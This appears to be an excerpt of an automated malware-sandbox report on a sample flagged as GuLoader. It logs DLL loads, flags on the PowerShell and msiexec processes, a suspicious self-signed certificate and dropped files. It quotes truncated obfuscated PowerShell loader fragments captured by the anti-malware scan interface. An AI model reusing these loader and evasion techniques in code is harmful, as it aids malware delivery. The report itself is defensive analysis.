Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\p7wgyD3kbI.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: p7wgyD3kbI.exe

Static file information: File size 1537272 > 1048576

Source: p7wgyD3kbI.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000008.00000002.1685806414.000000000A057000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Fyldestgjort $Lnforskels $Fistic), (spiderwort @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:montjoy = [AppDomain]::CurrentDomain.GetAssemblies()$global:
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Transpeptidation193)), $Kartonneredes).DefineDynamicModule($Leveringsdatoer, $false).DefineType($Ddsfaldets, $Strackling, [System.Mult

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0506A588 push eax; iretd	8_2_0506A701
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0506A677 push eax; iretd	8_2_0506A701
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0506EAF8 push eax; mov dword ptr [esp], edx	8_2_0506EB0C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_09562B31 push 8BD38B50h; iretd	8_2_09562B36

Persistence and Installation Behavior

AI detected suspicious PE digital signature

Source: Initial sample

Joe Sandbox AI: Detected suspicious elements in PE signature: Multiple highly suspicious indicators: 1) Self-signed certificate (issuer same as subject) which is not trusted by system providers 2) Organization 'Bollemlk' is not a known legitimate company 3) Email domain 'Sudaneserne.Lok' is highly suspicious - appears to be a fake TLD (.Lok) 4) Large time gap between compilation date (Aug 2020) and certificate creation (July 2024) suggests possible certificate manipulation 5) Organization unit name 'Muscoid Geometrician' appears randomly generated and nonsensical 6) While US-based address is given, other elements suggest attempt to mask true origin 7) Invalid signature further confirms certificate cannot be trusted. The combination of a self-signed certificate, suspicious organization/email, invalid signature and temporal inconsistencies strongly indicates this is a malicious attempt to appear legitimate.

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Supawn\Unbeholden\p7wgyD3kbI.exe			Jump to dropped file
Source: C:\Users\user\Desktop\p7wgyD3kbI.exe	File created: C:\Users\user\AppData\Local\Temp\nsm628F.tmp\nsExec.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\p7wgyD3kbI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
